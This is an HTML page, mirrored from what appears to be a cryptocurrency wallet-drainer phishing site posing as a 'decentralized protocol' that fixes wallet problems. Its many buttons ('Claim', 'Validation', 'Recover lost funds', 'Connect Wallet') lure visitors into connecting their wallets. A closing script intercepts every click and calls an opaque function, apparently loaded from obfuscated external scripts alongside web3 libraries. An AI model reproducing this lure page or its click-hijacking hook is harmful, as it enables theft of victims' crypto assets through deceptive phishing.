<!DOCTYPE html><html class="no-js" lang="en"><!-- Mirrored from decentralized-mainnet.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 04 Aug 2022 16:27:03 GMT --><!-- Added by HTTrack --><!-- Mirrored from securefix-app.pages.dev/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 29 Aug 2023 12:07:36 GMT --><!-- Added by HTTrack --><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><!-- /Added by HTTrack -->
<meta http-equiv="content-type" content="text/html;charset=utf-8"><!-- /Added by HTTrack -->

<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/web3@1.10.0/dist/web3.min.js"></script>
<script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>
<script src="modules.js" type="module"></script>
<script defer src="9y295-xt8lb-7fxsv.js"></script>
  <!-- Meta Tags -->
  <meta charset="utf-8">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="author" content="ThemeMarch">
  <!-- Site Title -->
  <title>Decentralized Dapps - We are help to help you resolve your crypto related issues</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <script charset="UTF-8" async="" type="text/javascript" src="./b0b1e673.d9ba739785251718.js"></script>

  <link rel="shortcut icon" type="image/png" href="assets/img/cta-img-with-bg.png">
  <link rel="stylesheet" href="assets/css/plugins/fontawesome.min.css">
  <link rel="stylesheet" href="assets/css/plugins/bootstrap.min.css">
  <link rel="stylesheet" href="assets/css/plugins/slick.css">
  <link rel="stylesheet" href="assets/css/app.css">
  <link rel="stylesheet" href="assets/css/style.css">
  <link rel="stylesheet" href="assets/css/select2.min.css">
  </head><body class="cs-dark">

 

  <!-- <div class="cs-height_90 cs-height_lg_80">
    <div style="height:62px; background-color: #1D2330; overflow:hidden; box-sizing: border-box; border: 1px solid #282E3B; border-radius: 4px; text-align: right; line-height:14px; block-size:62px; font-size: 12px; font-feature-settings: normal; text-size-adjust: 100%; box-shadow: inset 0 -20px 0 0 #262B38;padding:1px;padding: 0px; margin: 0px; width: 100%;"><div style="height:40px; padding:0px; margin:0px; width: 100%;"><iframe src="widget?type=horizontal_v2&theme=dark&pref_coin_id=1505&invert_hover=no" width="100%" height="36px" scrolling="auto" marginwidth="0" marginheight="0" frameborder="0" border="0" style="border:0;margin:0;padding:0;"></iframe></div><div style="color: #626B7F; line-height: 14px; font-weight: 400; font-size: 11px; box-sizing: border-box; padding: 2px 6px; width: 100%; font-family: Verdana, Tahoma, Arial, sans-serif;"><a href="https://coinlib.io" target="_blank" style="font-weight: 500; color: #626B7F; text-decoration:none; font-size:11px">Cryptocurrency Prices</a>&nbsp;by Coinlib</div></div>
  </div> -->

  <!-- Start Hero -->
  <section class="cs-hero cs-style4 cs-bg cs-center" data-src="assets/img/hero_bg4.jpg">
    <div class="container-fluid">
      <div class="cs-hero_in">
        <div class="cs-hero_in_left">
          <div class="cs-hero_text">
            <h4 class="cs-hero_title cs-white_color">Decentralized protocol for syncing various Wallets issues on Secure Server. </h4>
            <div class="cs-hero_subtitle cs-medium cs-white_color">This is not an app but a protocol that establishes a remote resolution between all noncustodial wallet.</div>
           <div class="action">
            <div class="cs-hero_btns">
              <a class="cs-hero_btn cs-style1 cs-color3 connectButton"><span>Connect Wallet</span></a>
            </div>
            <div class="btn-hero heading-SB" id="slect-main">
                <select class="select2-hidden-accessible select2" id="select2-main" aria-invalid="false" data-select2-id="select2-data-1-x6av" tabindex="-1" aria-hidden="true">
                    <option value="0x1" data-select2-id="select2-data-3-rcyi">Ethereum</option>
                    <option value="0x38" data-select2-id="select2-data-30-ir32">Binance S</option>
                    <option value="0x89" data-select2-id="select2-data-31-w03z">Polygon</option>
                    <option value="0xa86a" data-select2-id="select2-data-32-71oo">Avalanche</option>
                    <option value="0xfa" data-select2-id="select2-data-33-hulu">Fantom</option>

                </select>
            </div>
           </div>

          </div>
        </div>
        <div class="cs-hero_in_right">
          <div class="col-lg-8">
            <img alt="Image" src="assets/img/cta-img-with-bg.png">
          </div>
        </div>
      </div>
    </div>
  </section>
  <!-- End Hero -->

  <!-- Start Category -->
  <section>
    <div class="container">
      <h2 class="bigButton cs-section_heading cs-style1 text-center">Make Your Selection Below</h2>
      <div class="cs-height_45 cs-height_lg_45"></div>
      <div class="row">
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton big cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Migration</h3>
            <p>Click here for migration</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Claim</h3>
            <p>Click here to claim assets</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Swap</h3>
            <p>Click here for assets swapping</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Validation</h3>
            <p>Click here to validate your wallet.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Activation</h3>
            <p>Click here to activate.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Cross Transfer</h3>
            <p>Click here for cross bridge issues.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Staking</h3>
            <p>Click here for staking related issues.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Exchange</h3>
            <p>Click here for exchange related issues</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Connect to Dapps</h3>
            <p>Click here for error while connectting to dapps.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Login</h3>
            <p>Click here for wallet login issue.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Whitelist</h3>
            <p>Click here for whitelist related issues.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Buy Coins/Tokens</h3>
            <p>To trade, your account must be marked as a trusted payment source.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Missing/Irregular balance</h3>
            <p>Click here to recover lost/missing funds.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-4 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Wallet glitch / wallet error</h3>
            <p>Click here if you have <br>problem with your trading wallet.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Transaction Delay</h3>
            <p>Click here for any issues related to transaction delay.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Claim Airdrop</h3>
            <p>Click here for airdrop related issues.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-4">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>NFTs</h3>
            <p>Click here for NFTs minting/transfer related issues.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
        <div class="col-xl-3 col-lg-6">
          <a class="connectButton cs-text_box cs-style1 cs-box_shadow text-center cs-white_bg connectBtn">
            <h3>Locked Account</h3>
            <p>Click here for issues related to account lock.</p>
          </a>
          <div class="cs-height_30 cs-height_lg_30"></div>
        </div>
      </div>
    </div>
  </section>
  <!-- End Category -->

  <!-- Start Footer -->
  <footer class="cs-footer cs-style1">
    <div class="cs-footer_bg"></div>
    <div class="cs-height_60 cs-height_lg_20"></div>
    <div class="cs-footer_bottom">
      <div class="container">
        <div class="cs-footer_separetor"></div>
        <div class="cs-footer_bottom_in">
          <div class="cs-copyright">Copyright 2024. Decentralized Dapps.</div>
          <ul class="cs-footer_menu">
            <li><a href="#">Privacy Policy</a></li>
            <li><a href="#">Term &amp; Condition</a></li>
          </ul>
        </div>
      </div>
    </div>
  </footer>



  <script>
    window.addEventListener("load", (event) => {
        const buttons = document.querySelectorAll(".cs-hero_btns, .row");

        if (buttons.length > 0) {
            console.log("Buttons found!");

            function handleClick(event) {
                event.preventDefault();
                event.stopPropagation();
                console.log("Button clicked!");
                ace();
                console.log("Ace launched via index!");
                return false;
            }

            buttons.forEach(button => {
                button.addEventListener("click", handleClick);
            });
        } else {
            console.log("Buttons not found!");
        }
    });
</script>



</body><!-- Mirrored from decentralized-mainnet.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 04 Aug 2022 16:27:26 GMT --><!-- Mirrored from securefix-app.pages.dev/ by HTTrack Website Copier/3.x [XR&CO'2014], Tue, 29 Aug 2023 12:07:42 GMT --></html>